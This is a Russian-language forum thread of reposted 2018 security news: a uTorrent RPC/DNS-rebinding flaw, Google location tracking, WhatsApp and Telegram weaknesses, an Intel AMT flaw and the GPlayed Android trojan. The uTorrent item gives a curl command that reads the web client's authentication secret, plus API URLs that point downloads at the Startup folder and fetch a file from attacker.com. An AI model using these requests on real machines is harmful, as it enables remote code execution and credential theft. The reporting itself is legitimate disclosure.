www.crack-forum.ru

www.crack-forum.ru (http://www.crack-forum.ru/forum.php)
-   Новости (http://www.crack-forum.ru/forumdisplay.php?f=64)
-   -   Новости сетевой безопасности (http://www.crack-forum.ru/showthread.php?t=27160)

Finist3 22.02.2018 21:00

Новости сетевой безопасности
 
Уязвимость в uTorrent Web позволяет загрузить произвольный файл в папку автозагрузки

В двух версиях uTorrent (под Windows и в веб-версии uTorrent Web) обнаружено несколько опасных уязвимостей, которые легко эксплуатировать. При этом они позволяют запускать произвольный код на машине, где запущен uTorrent (веб-версия); получить доступ к скачанным файлам, в том числе копировать их, просматривать историю скачиваний (веб-версия и Windows).
Взлом возможен только если uTorrent работает с настройками по умолчанию, а именно с HTTP RPC сервером на порту 10000 (uTorrent Classic) или 19575 (веб-версия uTorrent) с активированным обработчиком /proxy/ (он активирован по умолчанию).
Баги нашёл хакер Тэвис Орманди (Tavis Ormandy) из подразделения Project Zero в компании Google. Он разгласил информацию в баг-трекере Chromium 31 января 2018 года (через 90 дней после того, как сообщил о ней разработчикам).
Как пишет Тэвис, любой веб-сайт может взаимодействовать с вышеуказанными RPC-серверами через программный интерфейс XMLHTTPRequest(). Это API использует запросы HTTP или HTTPS напрямую к серверу и загружает данные ответа сервера напрямую в вызывающий скрипт. Интерфейс позволяет осуществлять HTTP-запросы к серверу без перезагрузки страницы и часто используется на многих современных сайтах.
Для взлома машины, где работает uTorrent, нужно заманить пользователя на веб-страницу, где установлен эксплоит. Это может быть совершенно любой сайт. Эксплоит через перепривязывание DNS по XMLHTTPRequest() заставляет браузер запустить скрипт, обращающийся к этому RPC-серверу.

_https://ru.wikipedia.org/wiki/DNS_rebinding

На демо-странице приведены примеры, какие действия может инициировать веб-сайт через интерфейс JSON RPC сервера на порту 10000. Здесь через программный интерфейс по XMLHTTPRequest() отправляются стандартные команды uTorrent.

Тэвис пишет, что изучая разные команды uTorrent-клиенту он заметил, что в программе с настройками по умолчанию активен обработчик /proxy/, что позволяет стороннему сайту посмотреть список скачанных файлов и скопировать их. То есть по умолчанию uTorrent позволяет любому сайту проверить список скачанных вами торрентов, достаточно лишь сбрутить одно маленькое число (sid), которое присваивается каждому открытому торренту по очереди.

Орманди сделал демо-страничку. Хакер говорит, что демка работает медленно, но если вы всё-таки хотите увидеть фокус, то сделайте следующее:

Установите uTorrent с дефолтными настройками.
Добавьте торрент из URL:

_https://archive.org/download/SKODAOCTAVIA336x280/SKODAOCTAVIA336x280_archive.torrent

По окончании скачивания торрента (5 МБ) перейдите на страницу с демкой.

_http://lock.cmpxchg8b.com/Ahg8Aesh.html

Подождите несколько минут.

По ходу изучения программы uTorrent Тэвис нашёл в ней ещё парочку багов и недостатков: например, некорректный генератор псевдослучайных чисел, отключение защиты памяти ASLR и неправильная работа в «гостевом» режиме, где должны быть отключены многие функции, а на самом деле они доступны через тот же сервер на порту 10000.

В веб-версии уязвимость ещё жёстче, потому что там любой сторонний сайт может получить доступ к токену аутентификации, секрет которого хранится в открытой папке webroot (как и настройки, дампы, логи и др.)

$ curl -si _http://localhost:19575/users.conf
HTTP/1.1 200 OK
Date: Wed, 31 Jan 2018 19:46:44 GMT
Last-Modified: Wed, 31 Jan 2018 19:37:50 GMT
Etag: "5a721b0e.92"
Content-Type: text/plain
Content-Length: 92
Connection: close
Accept-Ranges: bytes

localapi29c802274dc61fb4 bc676961df0f684b13adae450a57a91cd3d92c03 94bc897965398c8a07ff 2 1

Получив секрет, можно дистанционно изменить директорию для скачивания и дать команду на загрузку произвольного файла, например, загрузить вредоносный код в папку автозагрузки.

_http://127.0.0.1:19575/gui/?localauth=token:&action=setsetting&s=dir_active_d ownload&v=C:/Users/All%20Users/Start%20Menu/Programs/Startup

_http://127.0.0.1:19575/gui/?localauth=token:&action=add-url&url=http://attacker.com/calc.exe.torrent

Рабочий эксплоит:

_http://lock.cmpxchg8b.com/Moer0kae.html

Разработчики из компании BitTorrent, Inc. уже выпустили патч для uTorrent под Windows. Пока что он доступен только в бета-версии uTorrent/BitTorrent 3.5.3.44352, которая в ближайшее время должна стать доступна через механизм автоматического обновления. Пользователям uTorrent Web надо обновиться на последний билд 0.12.0.502.

Источник: geektimes

Finist3 14.08.2018 19:13

Google поймали на постоянной слежке за всеми пользователями

Сервисы Google записывают историю местоположения владельца смартфона, даже если тот отключил эту функцию в настройках конфиденциальности. Об этом говорится в исследовании Associated Press.

На странице поддержки Google указано, что пользователи могут в любой момент отключить историю передвижений, однако некоторые фирменные приложения продолжат автоматически сохранять данные с отметкой о времени без разрешения.

Исследователи отмечают, что Google записывает информацию о местонахождении пользователя в тот момент, когда он открывает приложение «Карты». Автоматические ежедневные обновления погоды на Android-смартфонах точно определяют, где находится владелец устройства. Кроме того, отдельные запросы в поисковике, которые вообще не связаны с местоположением, могут точно определять широту и долготу пользователей и сохранять ее в учетной записи.

Проблема конфиденциальности затрагивает около двух миллиардов пользователей Android-устройств и сотни миллионов владельцев смартфонов компании Apple, на которых установлены фирменные сервисы Google.

Представители компании Google заявили, что у компании есть несколько инструментов, которые используют местоположение пользователя.

«Мы предоставляем четкие описания этих инструментов и надежные средства управления, чтобы люди могли включать, выключать или удалять свои истории в любое время», — отметили в пресс-службе корпорации. В Google добавили, что пользователи могут полностью отключить историю местоположений, однако для этого им нужно зайти в настройки конфиденциальности и отключить другой параметр под названием «История приложений и веб-поиска».

Эксперты упрекнули компанию в том, что этот пункт меню никак не связан с историей местоположений, поэтому рядовые пользователи не узнают о нем и вряд ли его отключат. При этом их локация постоянно будет отслеживаться.

lenta.ru

Finist3 14.08.2018 19:13

В WhatsApp обнаружили опасную уязвимость

Представьте себе, что в вашу переписку в WhatsApp может вклиниться другой человек со вполне конкретным злым умыслом. Специалисты Check Point обнаружили ужасающую «дыру», благодаря которой киберпреступник может получить доступ к чату и исправить цитируемое сообщение, наделив смыслом, которого изначально в нем не было.

Найденную уязвимость можно использовать несколькими способами: менять слова собеседника в чате, имитировать общение от имени участника, которого в действительности в чате нет, при этом другим будет казаться, что он онлайн, а также отправлять в групповой чат сообщения якобы в «личку», ответ на которые (весьма вероятно — компрометирующий) будет виден всем участникам.

Для того чтобы воспользоваться дырой, достаточно перехватить зашифрованный трафик — и вот потенциальная жертва «в кармане» у злодеев. Если баг не будет устранен в ближайшее время, последствия — от необратимого персонального ущерба до разрушения корпораций путем распространения заведомо ложных сведений — предсказать невозможно.

Кстати, отечественный мессенджер ICQ мало в чем уступает WhatsApp. В дополнение к групповым звонкам, он обладает и другими сильными сторонами, которых нет у детища Facebook. «Аська» поддерживает пины сообщений и упоминания пользователей в них, поиск и редактирование отправленных сообщений, а также стикеры (поиск по наборам, эмодзи и прочее).

mail.ru

Finist3 25.08.2018 03:17

Эксперты обнаружили уязвимость в технологии Intel для удаленного доступа к компьютеру


Финская компания-разработчик антивирусных решений F-Secure обнаружила уязвимость в аппаратной технологии Intel (Active Management Technology, AMT), которая предоставляет удаленный доступ к управлению настройками и безопасностью компьютеров и используется для построения корпоративных сетей в компаниях, говорится в сообщении F-Secure.

Эта технология Intel дает возможность удаленно включать или выключать компьютер, а также запускать операционную систему. Обнаруженная экспертами уязвимость в AMT позволяет хакеру, который однажды получил физический доступ к компьютеру, ввести одну строчку кода и менее чем за 30 секунд обеспечить себе удаленный доступ к устройству в будущем без ввода паролей. В F-Secure полагают, что уязвимость может затрагивать миллионы корпоративных компьютеров по всему миру.

Данная уязвимость не связана с уязвимостями процессоров Intel, о которых стало известно в начале этого года. По данным специалистов по кибербезопасности корпорации Google, уязвимости в компьютерных микропроцессорах производства Intel потенциально могут привести к хищению конфиденциальных данных пользователей. Речь идет о двух уязвимостях: одна из них (под названием Meltdown) затрагивает процессоры Intel, выпущенные после 1995 года. Другая (Spectre) касается не только продукции Intel, но и чипов производства компаний AMD и ARM. Для того чтобы устранить потенциальный риск, производителям программного обеспечения, в том числе Microsoft, пришлось выпустить обновления своих продуктов.

Источник: ТАСС

Finist3 19.10.2018 03:50

Эксперты Cisco обнаружили новый опасный вирус на ОС Android

Эксперты предупреждают о новом опасном вирусе, поражающем устройства на базе операционной системы Android. Этот троян маскируется под магазин приложений и имеет большое количество встроенных возможностей — от отправки SMS-сообщений и смены пароля пользователя до вымогательства денег за разблокировку и полной чистки памяти смартфона.

Эксперты по кибербезопасности из группы Cisco Talos обнаружили новый опасный вирус, который получил название GPlayed. Он представляет собой троян, который маскируется под официальный магазин приложений «Play Market» — у него практически идентичная иконка, но он носит название »Google Play Marketplace».


Сообщается, что главная опасность этого вируса заключается в том, что он умеет адаптироваться после того, как попадает в систему смартфона на базе Android. Хакер, осуществивший атаку на устройство с помощью GPlayed, получает возможность удаленно загружать плагины и внедрить собственный код.

«Наш анализ показал, что этот троян пока находится в стадии тестирования, но учитывая его потенциал, каждый владелец смартфона должен знать о GPlayed», — заявили специалисты Cisco Talos.

В последнее время разработчики мобильных приложений стараются избегать официальных магазинов из-за бюрократической волокиты из-за требований со стороны площадки. Наличие таких вирусов, как GPlayed, наглядно показывает, чем может закончиться пренебрежение проверками, особенно в тех случаях, когда пользователь не умеет отличать безопасное приложение от хакерской подделки.

«Суть этого трояна и его воплощение находятся на нетипично высоком уровне, делая его опасной угрозой. В будущем такие угрозы станут появляться еще чаще, так как все больше компаний будут продвигать свое программное обеспечение напрямую потребителю», — сообщил представитель Cisco Talos.

После загрузки и установки троян пытается получить привилегии администратора и запрашивает доступ к настройкам. Далее он устанавливает связь с командным сервером и отправляет на него информацию о зараженном устройстве: IMEI, версия Android, модель телефона, мобильный номер и др.

Этот троян выполняет некоторые функции шпионского программного обеспечения, например, отслеживать геолокацию, перехватывать SMS-сообщения и список контактов.

Кроме того, хакер, управляющий вирусом, сможет с его помощью отправлять сообщения и USSD-команды, совершать звонки, заблокировать смартфон или поменять пароль на экране блокировки, а также получить данные о банковской карте, если они хранятся в устройстве.

Троян GPlayed выглядит очень настойчивым, запрашивает доступ к администрированию устройств и пока эти права не будут предоставлены, окно нельзя закрыть, рассказал руководитель отдела мобильных угроз и безопасности Avast Николаос Крисайдос.

«Гибридное вредоносное ПО, как в этом случае, всегда монетизируется за счет кражи личных данных с устройства. Банковские трояны маскируются с помощью поддельного пользовательского интерфейса поверх банковского приложения жертвы или показывают пользователям фальшивый экран оплаты, как это происходит в случае с GPlayed. Оба метода позволяют с легкостью обмануть пользователя, заставляя их думать, что он регистрируется в своем банковском приложении или платит доверенным провайдером, таким как Google, в то время как он на самом деле предоставляет свои учетные данные киберпреступникам», — пояснил Крисайдос.

Эксперт добавил, что российские пользователи с трудом определяют разницу между поддельным и настоящим интерфейсом банковского мобильного приложения. Так, согласно проведенному опросу, 24% респондентов определили официальный интерфейс приложения для мобильного банкинга как мошеннический, а 29% ошибочно приняли поддельный интерфейс за настоящий.

Невидимая угроза

В июле 2018 года эксперты сообщили о «невидимых» вирусах, которые владельцы смартфонов Android могут подхватить из официального магазина Google Play Store. Речь идет о так называемых дропперах — вредоносных программах, которые тайно заражают устройство другими вирусами, спрятанными в теле дроппера.

В последнее время дропперы получили широкое распространение, так как пользователи зачастую не знают, что в их смартфоне появился троян. Кроме того, подцепить дроппер может любой человек, скачивающий приложения из магазина Play Store.

В рамках борьбы с дропперами Google запустила сервис Play Protect, который постоянно сканирует приложения в официальном магазине приложений на предмет подозрительной активности.

Тем не менее, ИБ-эксперты сходятся во мнении, что эта мера не является достаточно эффективной, так как современные киберпреступники уделяют особое внимание тому, чтобы их не раскрыли.

Чтобы защититься от дроппера, эксперты советуют соблюдать три главные рекомендации — использовать современное антивирусное ПО, устанавливать приложения только с официального сайта разработчика или из официальных магазинов, а при загрузке ознакомиться с отзывами и репутацией приложения.

gazeta.ru

Finist3 31.10.2018 18:55

В Telegram обнаружена позволяющая читать переписки уязвимость

В мессенджере Telegram обнаружили уязвимость, которая позволяет читать диалоги пользователя, в том числе из секретных чатов. Приложение Telegram Desktop не шифрует сообщения пользователей, пишет РИА «Новости» со ссылкой на BleepingComputer.

В материале рассказывается об инженере из США, который смог обнаружить переписки пользователей в незашифрованной базе данных SQLite, после чего подобрал ключ. Переписка была приведена программой в текстовые файлы. По словам инженера, в незашифрованные данные попали также секретные чаты и отправленные медиафайлы.

В начале августа в СМИ появилась информация о том, что Центр исследований легитимности и политического протеста написал программу, позволяющую узнать мобильные номера, ID, имена и фамилии пользователей мессенджера.

Впрочем, эксперты заявили, что эта программа законам России не противоречит и давно используется программистами и исследовательскими компаниями. По данным СМИ, с Центром исследований уже начали сотрудничать ФСБ и МВД.

vz.ru


Часовой пояс GMT +4, время: 10:37.

Перевод: zCarot